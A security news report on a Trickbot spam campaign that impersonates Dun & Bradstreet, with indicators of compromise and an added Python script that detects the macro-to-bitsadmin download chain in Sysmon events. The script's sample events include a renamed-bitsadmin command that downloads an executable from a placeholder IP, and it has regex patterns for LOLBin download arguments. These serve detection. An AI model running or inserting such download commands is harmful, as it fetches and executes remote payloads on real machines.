- The spam emails tried to mimic Dun & Bradstreet’s official site by having a lookalike, fake domain.
- These emails carried Word attachments whose macros drop BAT files that fetch and install the Trickbot payload.
Trickbot, one of the most persistent banking trojans currently in circulation, has been spotted in yet another spam campaign. This time the attackers impersonated the business analytics company Dun & Bradstreet.
The spam emails, disguised as a company 'complaint', carry a Word document with malicious macros that deliver Trickbot. The campaign is reported to have targeted users in the US.
The big picture
- The emails use the subject line “FW: Company Complaint #DNBC920201TF” and are sent from the lookalike domain dnbcomplaint[.]com, with the sender address service@dnbcomplaint[.]com.
- They carry a Word attachment named ‘DNBC920201TF.doc’ containing malicious macros.
- The macros run once the recipient opens the attachment and enables content. They drop several BAT files onto the system with instructions to download and install Trickbot.
- The macro then copies bitsadmin.exe, a legitimate Windows command-line tool for creating and managing Background Intelligent Transfer Service (BITS) download jobs, and renames the copy ld0CIC0.exe. The renaming is meant to evade security software that keys on the bitsadmin.exe file name; the copy still carries its original file name in its version resource, so it can be identified that way.
- ld0CIC0.exe then downloads an EXE file and several binary files, which are combined to form the Trickbot malware.
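The chain above (Word spawning a shell to run the dropped BAT file, then a renamed bitsadmin.exe issuing a download) leaves a recognisable trail in process-creation telemetry. The script below is an added example and not part of the original report: it scores Sysmon Event ID 1 message bodies for three signals, an Office host launching a shell interpreter, a binary whose on-disk name differs from the OriginalFileName compiled into its version resource, and download-style arguments to a known LOLBin. The sample events are constructed to mirror this campaign (file names from the report, a hypothetical user path and a TEST-NET download URL), not captured from an infected host.

```python
"""Flag maldoc-to-LOLBin activity in Sysmon process-creation events.

Sysmon Event ID 1 records both the on-disk path (Image) and the
OriginalFileName taken from the binary's version resource. Copying and
renaming bitsadmin.exe changes Image but not OriginalFileName, so the two
disagree for the ld0CIC0.exe copy described in the report.
"""
import ntpath
import re
from dataclasses import dataclass

# Windows binaries able to fetch files from the network and routinely abused
# by maldocs. Keys are OriginalFileName values; patterns match download-style
# arguments so the rule fires whatever the binary is currently called.
LOLBIN_DOWNLOADERS = {
    "bitsadmin.exe": re.compile(r"/transfer\b|/addfile\b", re.IGNORECASE),
    "certutil.exe": re.compile(r"-urlcache\b", re.IGNORECASE),
}
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass
class ProcessEvent:
    image: str
    original_file_name: str
    command_line: str
    parent_image: str


def parse_sysmon_message(text: str) -> ProcessEvent:
    """Parse the 'Field: value' lines of a Sysmon Event ID 1 message body."""
    fields = {}
    for raw in text.strip().splitlines():
        key, sep, value = raw.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return ProcessEvent(
        image=fields.get("Image", ""),
        original_file_name=fields.get("OriginalFileName", ""),
        command_line=fields.get("CommandLine", ""),
        parent_image=fields.get("ParentImage", ""),
    )


def analyze(event: ProcessEvent) -> list[str]:
    """Return the list of detection tags that apply to one event."""
    findings = []
    on_disk = ntpath.basename(event.image).lower()
    original = event.original_file_name.lower()
    parent = ntpath.basename(event.parent_image).lower()

    # A copied-and-renamed LOLBin keeps its compiled-in OriginalFileName.
    if original in LOLBIN_DOWNLOADERS and on_disk != original:
        findings.append(f"renamed_lolbin:{original}->{on_disk}")

    # Download-style arguments to a LOLBin, regardless of its current name.
    pattern = LOLBIN_DOWNLOADERS.get(original)
    if pattern and pattern.search(event.command_line):
        findings.append(f"lolbin_download:{original}")

    # An Office host launching a shell: the macro running its dropped .bat.
    if parent in OFFICE_HOSTS and on_disk in SHELLS:
        findings.append(f"office_spawned_shell:{parent}->{on_disk}")
    return findings


def scan(messages: list[str]) -> list[list[str]]:
    """Analyze each raw message body; one findings list per event."""
    return [analyze(parse_sysmon_message(m)) for m in messages]


# Constructed sample events (not real telemetry); paths and URL are hypothetical.
SAMPLE_EVENTS = [
    r"""Image: C:\Windows\System32\cmd.exe
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "C:\Users\victim\AppData\Local\Temp\DNBC920201TF.bat"
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE""",
    r"""Image: C:\Users\victim\AppData\Local\Temp\ld0CIC0.exe
OriginalFileName: bitsadmin.exe
CommandLine: ld0CIC0.exe /transfer upd /download /priority high http://198.51.100.7/p.exe C:\Users\victim\AppData\Local\Temp\p.exe
ParentImage: C:\Windows\System32\cmd.exe""",
    r"""Image: C:\Windows\System32\bitsadmin.exe
OriginalFileName: bitsadmin.exe
CommandLine: bitsadmin /list
ParentImage: C:\Windows\System32\cmd.exe""",
]

if __name__ == "__main__":
    for msg, tags in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(ntpath.basename(parse_sysmon_message(msg).image), tags or "clean")
```

The third event, a genuine bitsadmin.exe merely listing jobs, produces no findings, which is the point of matching on OriginalFileName and arguments rather than on the file name alone: a rule that only looked for the string "bitsadmin.exe" in Image would miss the ld0CIC0.exe copy entirely.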
Domains registered through GoDaddy - As in earlier campaigns, the domains used to send these emails were registered through GoDaddy.
“Today’s example of the spoofed domain is, as usual, registered via GoDaddy as registrar. Because of new GDPR rules, we cannot easily find the registrant’s name or any further details. dnbcomplaint.com hosted on & sending emails via 95.211.143[.]199 | 185.203.33[.]172 | 95.211.197[.]182 | 85.17.76[.]82,” myonlinesecurity.co.uk reported.
What can be done to prevent the infection?
Users are advised to keep macros disabled in Word and never click “Enable Content” on an unsolicited attachment. Current versions of Microsoft Office disable macros by default, and the Trust Center setting “Disable all macros without notification” removes the prompt that the lure relies on.
Furthermore, any Word file received by email should be opened in Protected View, a read-only sandbox in which macros and DDE fields do not execute. Protected View does not clean the document; the infection chain only starts if the user leaves it by choosing to edit and then enables content.